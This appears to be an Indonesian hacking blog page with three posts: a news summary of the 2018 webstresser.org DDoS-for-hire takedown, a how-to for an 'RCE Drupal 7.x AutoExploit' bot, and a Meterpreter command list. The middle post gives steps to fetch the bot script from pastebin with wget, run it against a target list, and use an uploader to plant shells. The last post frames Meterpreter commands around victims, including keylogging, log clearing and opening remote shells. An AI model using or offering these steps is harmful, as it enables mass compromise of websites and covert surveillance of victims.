WHAT'S NEW?
Loading...

Polisi Menutup Layanan 'DDoS-for-Hire' Terbesar di Dunia Berserta Adminnya Ditangkap

Polisi Menutup Layanan 'DDoS-for-Hire' Terbesar di Dunia Berserta Adminnya Ditangkap - Dalam sebuah pukulan besar terhadap penjahat dunia maya internasional, polisi Belanda telah menurunkan layanan 'DDoS-for-Hire' terbesar di dunia yang membantu para penjahat dunia maya meluncurkan lebih dari 4 juta serangan dan menangkap para administratornya.


Sebuah operasi yang dipimpin oleh National Crime Agency (NCA) Inggris dan Polisi Belanda, dijuluki "Power Off," dengan dukungan Europol dan selusin lembaga penegak hukum lainnya, mengakibatkan penangkapan 6 anggota kelompok di belakang "webstresser" .org "situs web di Skotlandia, Kroasia, Kanada, dan Serbia pada hari Selasa.

Dengan lebih dari 136.000 pengguna terdaftar, situs web Webstresser memungkinkan pelanggannya menyewa layanan sekitar $ 10 untuk meluncurkan serangan Distributed Denial of Service (DDoS) terhadap target mereka dengan sedikit atau tanpa pengetahuan teknis.

"Dengan webstresser.org, setiap pengguna terdaftar dapat membayar biaya nominal menggunakan sistem pembayaran online atau cryptocurrency untuk menyewakan penggunaan stressor dan booter," kata Europol.
Layanan ini juga bertanggung jawab atas serangan cyber terhadap tujuh bank terbesar di Inggris pada November tahun lalu, serta lembaga pemerintah dan industri game.


Situs Webstresser sekarang telah ditutup, dan infrastrukturnya telah disita di Belanda, Jerman, dan Amerika Serikat. Situs ini telah diganti dengan halaman yang mengumumkan bahwa pihak penegak hukum telah mengambil layanan offline.

Selain itu, pihak berwenang juga telah mengambil terhadap pengguna teratas dari pasar ini di Belanda, Italia, Spanyol, Kroasia, Inggris, Australia, Kanada dan Hong Kong, Europol mengumumkan.

Polisi Belanda mengatakan Operasi Power Off harus mengirimkan peringatan yang jelas kepada pengguna situs seperti webstresser.
"Jangan lakukan itu," Gert Ras, kepala unit High Tech Crime kepolisian Belanda, mengatakan. "Dengan melacak layanan DDoS yang Anda gunakan, kami membebaskan Anda dari anonimitas Anda, memberikan Anda catatan kriminal dan menempatkan korban Anda dalam posisi untuk mengklaim kembali kerusakan dari Anda."

Polisi juga mengingatkan orang-orang bahwa DDoSing adalah kejahatan, yang "hukumannya bisa berat." Jika Anda melakukan serangan DDoS, atau membuat, memasok atau memperoleh layanan pemecah atau pemecah masalah, Anda bisa berakhir di penjara, dan baik atau keduanya.

Sumber : https://thehackernews.com/2018/04/ddos-for-hire-hacker.html

RCE Drupal 7.x AutoExploit [B0T]


Image result for rce drupal 

Proof: RCE Drupal 7.x 
based: bash 
Thanks to: Zerobyte.id

STEP.
  1. Download source of RCE Drupal 7.x AutoExploit [B0T] with command
        "wget https://pastebin.com/raw/M0cCyaB7 -O rce.sh"
   2. Change the Permission with command
          "chmod +x rce.sh"
   3. Make a list of Target and save with extenssion .txt
 
   4. if " /bin/sh^M: bad interpreter " to fix write this command
                 "sed -i 's/\r//' rce.sh"

   5. Run the tools with command
                     "./rce.sh list.txt"

Nb: - zb.php is uploader to upload shell or upload your script
       - use wisely

 
 -Alazka



 


Command Meterpreter Metasploit

Related image

Untuk Para pengguna Operating System (OS) khususnya Kali Linux pasti tidak asing dengan tools yang bernama METASPLOIT ya tools ini sangat canggih biasa digunakan dalam kegiatan hacking, berikut adalah command dalam Metasploit.

  • ? - Untuk menampilkan menu bantuan
  • background - Untuk keluar sementara dari sesi
  • bgkill -  background
  • bglist - Untuk menampilkan background list yang berjalan
  • bgrun - Backgrond aktif
  • exit - Keluar dari meterpreter
  • help - Sama seperti perintah "?"
  • run - Jalankan.
  • cat - Sama seperti Linux, membaca dan menampilkan isi kontent suatu file
  • cd - Move ke directory
  • del - Delete
  • download - Untuk mendownload sesuatu yang terdapat di storage korban
  • edit -  untuk mengedit, tp menggunakan editor vim 
  • getlwd - Menampilkan direktori lokal sistem
  • lcd - Ubah direktori local
  • ls - Menampilkan list file, folder di direktori yang telah kita masuki
  • mkdir - membuat sebuah direktori/folder
  • rm - remove atau mendelete sesuatu
  • upload - Untuk upload sesuatu ke storage korban dari storage kita

 Perintah Network
  • ifconfig - Cek IP Kita
  • portfwd - Port forward pada sistem korban
  • route - Lihat atau modifikasi routing table korban
Perintah System pada Korban
  • clearav - menghapus log yangg pernah login ke system korban
  • execute - perintah untuk mengeksekusi file di windows melalu meterpreter
  • getpid - mengambil Proses ID pada windows (PID)
  • getprivs - mendapatkan hak akses apapun
  • getuid - mengambil info pengguna berjalan sebagai akses apa
  • kill - Lakukan atau eksekusi
  • ps - melihat proses yg berjalan
  • reboot - reboot pc korban
  • reg - interaksi dengan registry korban
  • shell -istilahnya membuka cmd korban
  • shutdown - Matikan komputer korban
  • sysinfo - menampilkan info sistem device korban, misal OS
Perintah User Intefaces
  • enumdesktops - Menampilkan list desktop yang dapat diakses
  • getdesktop - Menyusup ke Desktop korban
  • idletime - Mengecek waktu Idle korban
  • keyscan_dump - Dump dari keylogger yg kita start
  • keyscan_start - Menjalankan keylogger pada korban
  • keyscan_stop - Menghentikan keylogger yang kita start
  • screenshot - Mengambil screenshot desktop korban
  • set_desktop - Mengganti desktop meterpreter
 Cukup sekian yang baru saya. mungkin masih banyak lagi command yang lainnya.
-Alazka